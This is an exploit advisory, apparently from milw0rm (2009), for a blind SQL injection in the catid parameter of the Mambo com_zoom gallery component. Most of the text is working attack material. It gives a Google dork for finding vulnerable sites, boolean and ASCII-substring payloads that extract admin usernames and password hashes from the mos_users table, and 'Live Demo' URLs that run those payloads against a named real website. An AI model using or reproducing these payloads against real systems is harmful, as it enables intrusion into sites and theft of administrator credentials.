Mambo component com_zoom (catid) Blind SQL injection [_][-][X] _ ___ _ ___ ___ ___ _____ __ ___ __ __ ___ | |/ / || |/ __|___ / __| _ \ __\ \ / / |_ ) \ / \/ _ \ | ' <| __ | (_ |___| (__| / _| \ \/\/ / / / () | () \_, / |_|\_\_||_|\___| \___|_|_\___| \_/\_/ /___\__/ \__/ /_/ Red n'black i dress eagle on my chest. It's good to be an ALBANIAN Keep my head up high for that flag i die. Im proud to be an ALBANIAN ################################################################### Author : boom3rang Contact : boom3rang[at]live.com Greetz : H!tm@N - KHG - cHs R.I.P redc00de ------------------------------------------------------------------- Affected software description zoom 20/01/2004 Mike de Boer mailme@mikedeboer.nl www.mikedeboer.nl 2.0 ------------------------------------------------------------------- [~] SQLi : http://www.TARGET.com/index.php?option=com_zoom&Itemid=0&catid=[SQLi] [~]Google Dork : inurl:com_zoom inurl:"imgid" ------------------------------------------------------------------- [~] Table_NAME = mos_users [~] Column_NAME = username - password ------------------------------------------------------------------- [~] Admin Path : http://www.TARGET.com/administrator =================================================================== = POC = =================================================================== [~] Live Demo: ttp://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=1/* --> True ttp://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=2/* --> False ------------------------------------------------------------------- [~] ASCII index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>96 ------------------------------------------------------------------- [~] Live Demo ASCII True http://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>96 False http://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>97 Like we see, the first charter of username is 'a' char(97)=a Now you can change the second limit to find other charters, Good Luck... note: zoom 20/01/2004 Mike de Boer mailme@mikedeboer.nl www.mikedeboer.nl 2.0 # milw0rm.com [2009-09-04]